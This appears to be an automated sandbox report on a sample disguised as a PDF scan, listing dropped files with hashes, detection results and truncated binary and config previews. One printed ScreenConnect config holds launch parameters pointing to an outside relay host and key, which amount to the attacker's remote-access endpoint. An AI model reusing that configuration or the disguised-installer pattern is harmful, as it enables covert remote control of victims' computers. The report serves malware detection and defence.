                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):260168
                                                                                          Entropy (8bit):6.416438906122177
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                          MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                          SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                          SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                          SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):61216
                                                                                          Entropy (8bit):6.31175789874945
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                                                          MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                                                          SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                                                          SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                                                          SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):266
                                                                                          Entropy (8bit):4.842791478883622
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):601376
                                                                                          Entropy (8bit):6.185921191564225
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
                                                                                          MD5:20AB8141D958A58AADE5E78671A719BF
                                                                                          SHA1:F914925664AB348081DAFE63594A64597FB2FC43
                                                                                          SHA-256:9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
                                                                                          SHA-512:C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):266
                                                                                          Entropy (8bit):4.842791478883622
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                          Malicious:true
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):842248
                                                                                          Entropy (8bit):6.268561504485627
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                          MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                          SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                          SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                          SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):81696
                                                                                          Entropy (8bit):5.862223562830496
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
                                                                                          MD5:B1799A5A5C0F64E9D61EE4BA465AFE75
                                                                                          SHA1:7785DA04E98E77FEC7C9E36B8C68864449724D71
                                                                                          SHA-256:7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
                                                                                          SHA-512:AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):266
                                                                                          Entropy (8bit):4.842791478883622
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                          MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                          SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                          SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                          SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1970
                                                                                          Entropy (8bit):4.690426481732819
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
                                                                                          MD5:2744E91BB44E575AD8E147E06F8199E3
                                                                                          SHA1:6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
                                                                                          SHA-256:805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
                                                                                          SHA-512:586EDC48A71FA17CDF092A95D27FCE2341C023B8EA4D93FA2C86CA9B3B3E056FD69BD3644EDBAD1224297BCE9646419036EA442C93778985F839E14776F51498
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa
                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                          File Type:XML 1.0 document, ASCII text, with very long lines (456), with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):946
                                                                                          Entropy (8bit):5.773897038357692
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:2dL9hK6E4dl/AGu44AUXgzfwM3lTX+5iwntUEvH:chh7HH2LsfwudX+5i8UEv
                                                                                          MD5:02858F1E37DEA6753DE82DE6770266BA
                                                                                          SHA1:85DA2547FC2D05473FD5847581746FE196FC5DC9
                                                                                          SHA-256:6277CE4D3BB166CDDFA104FBF2F1892353BE95C2B1BDD025B102B08B41B4E5D4
                                                                                          SHA-512:661C5D66E3D615DDE1DDF6D7103C52017E65EFFF56E77828AF3B56A0E934B908614C0B2638426BF7F3730EBF5F4A7BA3522E7CBE3766BB22420773C84C4E8E59
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=kkl22.ddns.net&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                          Process:C:\Users\user\Desktop\Scan_PDF_2017163298.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):321
                                                                                          Entropy (8bit):5.36509199858051
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                          MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                          SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                          SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                          SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                          Malicious:true
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):746
                                                                                          Entropy (8bit):5.349174276064173
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                          MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                          SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                          SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                          SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                          Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                          Category:dropped
                                                                                          Size (bytes):1086792
                                                                                          Entropy (8bit):7.793516535218678
                                                                                          Encrypted:false
                                                                                          SSDEEP:24576:4UUGG/qSDceVjLHGeRdtRiypAxiK7cl72km/4aoczU:bG/XcW32gqkAfosU
                                                                                          MD5:30CA21632F98D354A940903214AE4DE1
                                                                                          SHA1:6C59A3A65FB8E7D4AD96A3E8D90E72B02091D3F4
                                                                                          SHA-256:4BB0E9B5C70E3CAEB955397A4A3B228C0EA5836729202B8D4BA1BE531B60DAFC
                                                                                          SHA-512:47509F092B089EB1FFC115643DCDFBFAC5F50F239DE63ECAD71963EC1D37FF72B89F5A2AEA137ED391BA9BA10947ABBE6103DB1C56032FD6B39A0855CB283509
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):234
                                                                                          Entropy (8bit):4.977464602412109
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                          MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                          SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                          SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                          SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                          Malicious:false
                                                                                          Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):4.62694170304723
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
                                                                                          MD5:77BE59B3DDEF06F08CAA53F0911608A5
                                                                                          SHA1:A3B20667C714E88CC11E845975CD6A3D6410E700
                                                                                          SHA-256:9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
                                                                                          SHA-512:C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36864
                                                                                          Entropy (8bit):4.340550904466943
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
                                                                                          MD5:4717BCC62EB45D12FFBED3A35BA20E25
                                                                                          SHA1:DA6324A2965C93B70FC9783A44F869A934A9CAF7
                                                                                          SHA-256:E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
                                                                                          SHA-512:BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):57344
                                                                                          Entropy (8bit):4.657268358041957
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
                                                                                          MD5:A921A2B83B98F02D003D9139FA6BA3D8
                                                                                          SHA1:33D67E11AD96F148FD1BFD4497B4A764D6365867
                                                                                          SHA-256:548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
                                                                                          SHA-512:E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):176128
                                                                                          Entropy (8bit):5.775360792482692
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
                                                                                          MD5:5EF88919012E4A3D8A1E2955DC8C8D81
                                                                                          SHA1:C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
                                                                                          SHA-256:3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
                                                                                          SHA-512:4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):548864
                                                                                          Entropy (8bit):6.031251664661689
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                                                          MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                                                          SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                                                          SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                                                          SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          • Antivirus: Virustotal, Detection: 0%, Browse
